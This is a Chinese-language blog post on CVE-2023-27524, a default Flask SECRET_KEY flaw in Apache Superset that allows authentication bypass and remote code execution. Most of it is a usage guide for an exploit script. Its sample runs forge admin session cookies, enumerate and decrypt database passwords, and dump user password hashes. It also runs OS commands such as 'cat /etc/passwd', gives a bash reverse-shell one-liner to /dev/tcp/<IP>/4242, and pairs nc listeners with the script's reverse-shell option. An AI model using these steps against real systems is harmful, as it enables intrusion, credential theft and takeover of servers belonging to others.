CVE-2023-27524:Apache Superset Auth 绕过和 RCE

2024-01-08 11:03:39 浏览数 (2)

Apache Superset 是一种广泛使用的数据可视化和探索开源工具,已被确定存在潜在的安全漏洞,可能导致身份验证绕过和远程代码执行 (RCE)。这些漏洞可能使恶意行为者能够获得目标服务器上的管理权限,从而使他们能够收集用户凭据并可能危及数据。

所涉及的具体安全问题是一个不安全的默认配置漏洞,称为 CVE-2023-27524。

根本原因在于安装过程中设置的可预测的 Flask Secret Key,影响了大量暴露的 Apache Superset 实例。尽管已经采取了一些缓解措施,但对于那些尚未更新其配置的人来说,此漏洞仍然是一个严重的问题。

官方漏洞描述:

Apache Superset 2.0.1 及之前版本中的会话验证攻击。未根据安装说明更改默认配置的 SECRET_KEY 的安装允许攻击者验证和访问未经授权的资源。这不会影响更改 SECRET_KEY 配置默认值的 Superset 管理员。

用法

安装 PIP 包:

代码语言:javascript复制
pip3 install -r requirements.txt                   
代码语言:javascript复制
usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD]
                  [--revshell REVSHELL] [--db-host]

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Host URL
  --id ID               User ID to forge session cookie for. Default=1
  --wordlist WORDLIST, -w WORDLIST
                        Specify a wordlist file (default is 10.txt)
  --validate, -v        Validate the presence of vulnerability by login attempt
  --enum-dbs, -dbs      Enumerate databases
  --enum-users, -eu     Enumerate databases
  --cmd CMD, -c CMD     Run custom OS command on the database's server.
  --revshell REVSHELL   Specify IP:Port for reverse shell
  --db-host             Run commands or open reverse shell on the database server

验证漏洞并尝试使用自定义单词列表破解应用程序

代码语言:javascript复制
# python3 exploit.py --url http://localhost:8088 -v -w 10k_most_common_passwords.txt 
[ ] Session cookie found.
[ ] Decoded session cookie: <REDACTED>
[ ] Using '10k_most_common_passwords.txt' as a wordlist.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
[ ] Forged session cookie for user 1: <REDACTED>
[ ] Superset Version: 2.0.1
[ ] Login successful. Vulnerability is validated.

枚举数据库

代码语言:javascript复制
代码语言:javascript复制
# python3 exploit.py -u http://localhost:8088 --enum-dbs      
[ ] Session cookie found.
[ ] Decoded session cookie:
    {'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM
[ ] Version 2.0.1 seems vulnerable.
[ ] Enumerating databases via API...
[ ] Found database: "examples" with password "superset".
[ ] Found database: "SQLite".
[ ] Enumerating database connection data and cracking password if possible...
 ----------------- --------------------------------------------------- -------------------------- ---------------------- 
| database_name   | sqlalchemy_uri                                    | password                 | decrypted_password   |
|----------------- --------------------------------------------------- -------------------------- ----------------------|
| examples        | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset********     |
| SQLite          | sqlite pysqlite:////app/superset_home/superset.db |                          |                      |
 ----------------- --------------------------------------------------- -------------------------- ---------------------- 
[ ] Process of enumerating databases finished.

枚举 Superset 用户

代码语言:javascript复制
代码语言:javascript复制
# python3 exploit.py -u http://localhost:8088 --enum-users              
[ ] Session cookie found.
[ ] Decoded session cookie:
    {'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs
[ ] Version 2.0.1 seems vulnerable.
[ ] Checking existing metadata database connection...
[ ] Settings of database with id 1 were successfully modified.
[ ] Settings of database with id 2 were successfully modified.
[ ] Superset metadata connection is already added with id 2.
[ ] Trying to enumerate Superset users...
[ ] RESULT:
 ------------ -------------------------------------------------------------------------------------------------------- 
| username   | password                                                                                               |
|------------ --------------------------------------------------------------------------------------------------------|
| admin      | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |
 ------------ -------------------------------------------------------------------------------------------------------- 

运行自定义操作系统命令

在 Superset 服务器上:

代码语言:javascript复制
# python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'

请注意,在这种情况下还无法查看输出。

在数据库服务器上:

代码语言:javascript复制
# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host

[ ] Session cookie found.
[ ] Decoded session cookie:
    {'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}
[ ] Using default secret keys.
[ ] Superset instance is VULNERABLE to CVE-2023-27524.
[ ] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[ ] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig
[ ] Version 2.0.1 seems vulnerable.
[ ] Trying to run command on the database server...
[ ] Settings of database with id 1 were successfully modified.
[ ] $ cat /etc/passwd
 ----------------------------------------------------------------------------------- 
| cmd_output                                                                        |
|-----------------------------------------------------------------------------------|
| root:x:0:0:root:/root:/bin/bash                                                   |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                   |
| <REDACTED>                                                                        |
| postgres:x:999:999::/var/lib/postgresql:/bin/bash                                 |
 ----------------------------------------------------------------------------------- 

打开反向shell

在 Superset 服务器上:

代码语言:javascript复制
# Terminal 1
nc -lvnp [PORT]

# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT]

在数据库服务器上:

代码语言:javascript复制
# Terminal 1
nc -lvnp [PORT]

# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host

0 人点赞